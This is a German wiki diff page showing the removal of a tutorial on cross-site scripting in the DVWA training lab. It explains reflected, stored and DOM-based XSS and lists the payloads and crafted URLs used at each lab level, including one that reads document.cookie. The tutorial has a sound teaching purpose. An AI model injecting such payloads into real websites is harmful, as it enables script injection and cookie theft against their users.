Cross-Site-Scripting Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde geleert.)
Markierung: Geleert
Zeile 1: Zeile 1:
  
=Original Artikel=
 
*https://tanmay26.medium.com/cross-site-scripting-xss-dvwa-damn-vulnerable-web-applications-36808bff37b3
 
 
 
=Cross-Site-Scripting (XSS)=
 
*Technik, bei der Angreifer bösartige Skripte in eine Zielwebsite einschleusen
 
*Es kann ihnen die Zugriffskontrolle auf die Website ermöglichen.
 
*Gefahr besteht,wenn Benutzern die Eingabe von Daten Felder ohne Kontrollen ermöglicht wird.
 
*Ein Angreifer kann dann auch ein Skript mit schädlichem Code einfügen.
 
 
=ARTEN VON XSS=
 
*Reflektiertes XSS
 
*Gespeichertes XSS
 
*Dom-Basis XSS
 
 
=Reflected XSS (Cross-Site-Scripting): RXSS=
 
*In diesem Fall werden keine Hackerdaten auf der Website gespeichert.
 
*Der Code wird nur auf der Opferseite ausgeführt.
 
*Hacker sendet ein Eingabeskript dieser Website, das dann an den Browser des Opfers reflektiert wird
 
*Der Hacker lässt dann schädlichen JavaScript-Payload ausführen.
 
 
==DVWA Low Level Reflected XSS==
 
===Firefox===
 
Payload: <script>alert("xss")</script>
 
[[Datei:Xss-1.png|400px]]
 
===Chromium===
 
;Erzeugte Link
 
*http://opfer:82/vulnerabilities/xss_r/?name=+%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E#
 
==DVWA High Level Reflected XSS==
 
===Chromium===
 
Payload: <img src=x onerror=alert("xinux")>
 
[[Datei:Xss-3.png|400px]]
 
===Firefox===
 
;Erzeugte Link
 
*http://opfer:82/vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%22xinux%22%29%3E#
 
 
=Stored XSS (Cross site scripting):SXSS=
 
*Gespeichertes Cross-Site-Scripting (XSS)
 
*Der Hacker-Schadcode wird auf der Zielwebsite gespeichert.
 
*Ein Angreifer sendet bösartiges JavaScript in die Website.
 
*Dieses Skript wird auf den Computern anderer Benutzer ausgeführt.
 
==DVWA Low Level Stored XSS==
 
===Firefox===
 
Payload: <script>alert(document.domain)</script>
 
[[Datei:Xss-4.png|400px]]
 
===Chromium===
 
;Erzeugter Link
 
*http://opfer:82/vulnerabilities/xss_s/
 
=DOM BASE XSS=
 
*Der Dom Base (XSS) ist ein Kurzform-Dokumentobjektmodell-basiertes Cross-Site-Scripting.
 
*Das heißt, die HTTP-Antwort der Seite selbst ändert sich nicht.
 
*Ein Angreifer kann mehrere DOM-Objekte verwenden, um einen Cross-Site-Scripting-Angriff zu erstellen.
 
*Die beliebtesten Objekte aus dieser Perspektive sind document.URL, document.location und document.referrer.
 
 
;DVWA low level DOM XSS:
 
Payload: <nowiki>https://opfer:82/vulnerabilities/xss_d/?default=<script>alert("xinux 1")</script></nowiki>
 
 
[[Datei:Xss-7.png|400px]]
 
 
;DVWA Medium level DOM BASE:
 
Payload: <nowiki>https://opfer:82/vulnerabilities/xss_d/?default=English#<script>alert("xinux 2")</script></nowiki>
 
;and reload your browser.
 
 
[[Datei:Xss-8.png|400px]]
 
 
 
;DVWA HIGH LEVEL DOM BASE:
 
Payload: <nowiki>https://opfer:82/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script></nowiki>
 
;and reload browser.
 
 
[[Datei:Xss-9.png|400px]]
 
 
=Reference=
 
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html
 
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/xss.html
 

Version vom 6. März 2023, 13:23 Uhr

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_Beispiele&oldid=42694